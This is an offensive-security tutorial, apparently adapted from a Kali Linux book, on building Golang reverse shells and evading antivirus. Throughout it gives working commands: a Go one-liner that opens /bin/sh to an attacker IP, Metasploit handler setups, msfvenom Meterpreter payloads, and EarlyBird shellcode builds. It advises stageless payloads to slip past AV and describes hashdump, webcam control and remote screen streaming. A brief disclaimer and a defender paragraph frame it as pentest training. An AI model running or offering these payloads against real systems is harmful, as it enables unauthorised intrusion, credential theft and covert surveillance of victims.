Introduction
Creating Reverse Shells and bypassing Anti-Virus (AV) with Golang. Using Golang in security has become very popular over the last few years. In this article, I want to cover several existing Golang scripts that you can use to create Reverse Shells and possibly even bypass Anti-Virus. We will start our journey looking at a one-line reverse shell in Go, and then cover a couple apps that can generate multiple different shells. This article isn’t about writing custom Go scripts or post exploit - what to do after you get a remote shell. It is simply a quick and dirty overview of some existing Go shellcode for Pentesters and Red Teams.
Swissky’s one-line Go shell is up first. This one-line reverse shell works great against Linux based targets. Next, we will look at Girsh, a menu driven script that can create multiple different reverse shells for both Linux and Windows. Lastly, we will look at Go-Shellcode, a very good Go reverse shell that, at last testing and with the right payload, still bypasses most common Windows antivirus products.
As always, this article is for educational & informational purposes only.
Never try to access systems without permission.
I used two Kali Linux VMs for this article, one a target and the other an attack system. Golang was already installed on the attacking system. I also used a Windows 11 system and a Windows Server 2022 (not shown) for testing the Go-Shellcode Early Bird code.
Swissky Repo – Payload All the Thing, Golang Shell
Tool GitHub Site: https://github.com/swisskyrepo
Swissky’s GitHub site has a one-line reverse shell for Golang that works great on Linux. All you need is a Netcat listener set up on the attacker system and then run the one liner on the Linux target.
Just set up a Netcat listener on the attacking system:
On the target, take the one line Go payload from Swisskyrepo1 and enter the attacker IP address. Then, run it on the target system.
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","[Attacker_IP_Address]:4242");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
As seen below:
If the target system has Golang installed, we immediately get a shell:
Before we continue, there are several Go reverse shells available online and on GitHub that basically just open a simple remote communication shell to Netcat. You don’t have to use Netcat on the attacker system, you can use the Metasploit Framework to catch this type of basic shell. Yes, it also works for Netcat-like shellcode that is compiled to run on Windows targets as well. Granted, it won’t be a Meterpreter shell, just a basic shell, but if the target is Windows-based, you could try the “upgrade shell to Meterpreter” module in Metasploit. Windows Defender does catch and block the “upgrade shell to Meterpreter” post module, but other AV products may not.
You can learn more about upgrading your shell to Meterpreter here - https://docs.metasploit.com/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html
Let’s take a minute and look at catching a basic Netcat shell with Metasploit.
Catching Netcat (Generic) Shells using Metasploit
You can use the Metasploit framework on your attacker system instead of just using Netcat. To do so, just start Metasploit on your attacking system and use a Multi Handler. For a Linux target, you will need the “generic/shell_reverse_tcp” payload. Metasploit loads this as default, but I set it manually just to be sure. Then just enter your attacker IP address as LHOST and enter the port used as LPORT. When all is set, just enter “exploit”.
As seen below:
Now, run the one liner Go attack on the target system again. Metasploit acts like Netcat and completes the remote shell.
The process is the same if the target is Windows based, and you are using a Windows version of a Netcat-like shell attack. Just change the payload in Multi Handler to the Windows x64 shell.
As seen below:
Notice the only change is switching from the generic shell to the Windows x64 shell. Using the plain reverse shell payloads in Metasploit, you can catch any of the Netcat shells written in any language, and for any target platform.
Girsh - Golang Interactive Reverse Shell vs Linux
Tool Author: nodauf
Tool GitHub: https://github.com/nodauf/Girsh
Girsh is a quick and easy menu driven remote shell written in Golang. Until recently, the PowerShell module in Girsh did bypass Microsoft Defender and other major AV products. Though Defender catches it now, you may still have some luck with it against other AV products. For this example, we will create a quick Linux shell with it.
Install & Usage
With Golang installed, all you need to do is pull Girsh down from GitHub.
- git clone https://github.com/nodauf/Girsh
- cd src
- go run main.go listen
On first run, it will download multiple dependencies. It will then display a Girsh prompt.
As seen below:
- Type “menu” to create a reverse shell
- Use the arrows to select an interface, then press enter
- When prompted for a reverse shell type, select “python”
You are presented with multiple Python commands. Copy and run one of them on your target system.
You should immediately get a remote session.
- To see available sessions, type, “sessions”
- Then connect to the session you want using the “connect ID#” command
As seen below:
You now have a fully interactive remote shell.
Go-Shellcode
Tool Author: Ne0nd0g
Tool GitHub: https://github.com/Ne0nd0g/go-shellcode
Go-Shellcode is a great collection of shellcode runners and utilities, written by Ne0nd0g, the creator of the Merlin C2. Go-Shellcode is nice, because it allows you to run exploit shellcode in Go, using various API call techniques. It’s fast, works great against antivirus, and allows you to use any hex encoded shellcode as a payload, especially ones created with MSFvenom.
Make sure you have Go installed on your Kali system, and then just:
- git clone https://github.com/Ne0nd0g/go-shellcode.git
Once installed, you have multiple ways to create shellcode. Navigate to the ‘go-shellcode/cmd’ directory, and you will see a list of shellcode delivery techniques, one per folder. Pick one of the techniques - see the tool GitHub page for descriptions for each one.
Then just modify the main.go file in the corresponding subdirectory, inserting the shellcode that you want to run. Each technique comes default with a “Pop Calculator” shellcode string.
As seen below:
Of course, you don’t have to stick with the Popup Calculator shellcode - though I highly recommend using that on your first attempt. You can use any hex Shellcode that you want, using the following procedure.
- Create your shellcode with MsfVenom, using a filetype (-f) of “hex”.
- Copy and paste it into the code, replacing the existing shellcode DecodeString number string.
- Next, build the Go file using the instructions for the individual technique, listed on the GitHub page. When finished, a Windows .exe file will appear in the main directory.
- If it is a remote shell, just make sure you have Metasploit multi-handler running to catch the call back.
- Finally, copy the shellcode file to the target and run it.
The code layout is very nice, it makes it very easy to pick the API technique you want, then just generate your desired shellcode and drop it in.
The EarlyBird gets the Shell
Let’s run through one of the techniques together. We will use the latest one, Go-Shellcode EarlyBird. To try it out with the default “pop calculator” shellcode, just enter the following from the main “go-shellcode” directory.
- export GOOS=windows GOARCH=amd64;go build -o popcalc.exe cmd/EarlyBird/main.go
This will create the file, “popcalc” in the go-shellcode directory. Just copy this file to our Windows server target and run it. Windows calculator will open - you have successfully exploited a system with the dreaded calculator exploit! If you have never heard about “Popping Calc”, it is a fairly popular pentester joke.
Alright, let’s use a different shellcode. It would be nice to pop up a messagebox on the target instead of a calculator. We can do this easily with Msfvenom and the messagebox payload.
First, generate the hex payload:
- In a Kali Linux Terminal, enter, “msfvenom -p windows/x64/messagebox -f hex”
Use your favorite editor to open the main.go file in the EarlyBird directory. Then just copy and paste the hex code into the main.go program, replacing the existing popcalc hex code. Copy the entire HEX code, and paste it over (replacing) the existing HEX shellcode string.
As indicated below:
// Pop Calc Shellcode (x64)
shellcode, errShellcode := hex.DecodeString("[Place New Hex String HERE]”)
if errShellcode != nil {
Generate the code again:
- export GOOS=windows GOARCH=amd64;go build -o message.exe cmd/EarlyBird/main.go
Copy the new Message.exe file to the Windows target and run it.
Proof of exploit - nice! Okay, that is a pretty generic message, let’s see if we can improve on it. Let’s take a look at the ‘messagebox’ payload.
- Open another terminal and start Metasploit (msfconsole)
- Type “info windows/x64/messagebox”
Here we see information about the payload, including the Text and Title. This info is pretty generic, so let’s change it. We can set the options on the fly when we generate the payload with msfvenom.
- msfvenom -p windows/x64/messagebox TEXT=”Something Evil this Way Comes” TITLE=”HackerBox” -f hex
We set the TEXT and TITLE variables right from the msfvenom command. Let’s see if it worked!
- Copy and paste the new shellcode into the main.go program
- Generate the code, call it “Messagebox2.exe”
- Run it on our Windows target:
Very nice! In some Pentest or Red Team engagements, you just need proof of compromise, so this might work nicely. Let’s take it a step further and use the Go program to create a Meterpreter remote shell.
First, we need to generate the shellcode with msfvenom. Let’s try a different reverse shell, just to change things up a little, “reverse_winhttp”.
- msfvenom -p windows/x64/meterpreter/reverse_winhttp LHOST=”[Kali_IP_Address]” -f hex
Yes, in case you were wondering, you can run msfvenom directly in Metasploit.
- Copy and paste the hex code into main.go, totally replacing the previous shellcode
- Generate it; let’s use a name of ‘winhttp.exe’
- export GOOS=windows GOARCH=amd64;go build -o winhttp.exe cmd/EarlyBird/main.go
Before we run it, we need to start a multi-handler in Metasploit to catch and respond to the call out.
In Metasploit:
- use multi/handler
- set payload windows/x64/meterpreter/reverse_winhttp
- set LHOST [Kali_IP]
- exploit -j
Now copy the winhttp.exe file to your Windows target and run it and we get a remote shell!
Type “help” to see available Meterpreter commands. We can upload or download files, even grab a screenshot or control the webcam. If the remote user is an administrator, we can run the Meterpreter command, “Hashdump” to grab the user password hashes.
“Screenshare” is a newer Meterpreter command. Running this opens a browser on Kali and forces the remote system to live stream the desktop to the Kali system!
I use Go-Shellcode EarlyBird a lot, it is one of my favorite shells. Remember too, EarlyBird is just one of the APIs that you can use, Go-Shellcode has several! Very recently, AV is catching the staged Meterpreter shell even using EarlyBird. What is being caught though, is when the stager calls back to Metasploit and downloads the second part of the shell – the solution? Just use the stageless Meterpreter (windows/x64/meterpreter_reverse_tcp) payload shell! It’s extremely long, but works great in Early Bird!
I’ll leave this up to the reader to try, but this is the multi-handler to catch it:
Conclusion
In this article, we covered several Golang scripts used to create remote shells. I get asked all the time online, what is the best remote access shell? As always, custom code is the best for bypassing antivirus. Many Red Teams and large pentest companies have their own coders on staff that hand code or modify exploits and even write their own Command and Control Platforms. This is the best way to help ensure that they will not be detected in the target environment.
It is truly a cat and mouse game. As soon as a new bypass is publicly disclosed, AV companies quickly write a signature to block it. As a defender, you can’t rely on antivirus alone to protect your company. There are some very good security suites available that go way beyond standard AV. Network Security Monitoring (with full packet capture) is very useful as well. This helps detect active threats and is very useful if things go bad. I highly recommend checking out all of the solutions and seeing what works best for your specific environment.
Want to learn more about how to use Go coding in offensive security? I highly recommend the following two books:
- “Security with Go” by John Daneil Leon
- “Black Hat Go” by Tom Steele, Chris Patten, and Dan Kottmann
Both books are exceptional and walk you through custom coding many security tools. If you are newer to coding with Go, I recommend starting with “Security with Go”. I think the examples are much easier to follow.
The majority of this article is a direct adaptation of a chapter from one of my latest books. If you liked this article, and want to learn a lot more about the Techniques, Tactics and Procedures (TTPs) that hackers use, in a step-by-step lab environment, then check out my new book:
- “Advanced Security Testing with Kali Linux” by Daniel W. Dieterle
Available on Amazon!
References
1 Swissky, “Golang Reverse Shell Cheatsheet”, Payloads All the Things - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#golang
About the Author
Daniel W. Dieterle, aka “CyberArms”, has been in the computer industry for over twenty years, and currently is a Security Author, Researcher & Consultant. He is an Internationally Published Author that just released his eighth book, “Security Testing with Raspberry Pi, Second Edition”. He is also working on his next book, a complete overhaul of his original, “Basic Security Testing with Kali Linux” which will be available next year. Daniel runs two tech blogs - cyberarms.wordpress.com & DanTheIOTMan.com, and is very active as a mentor, helping those new to the security field.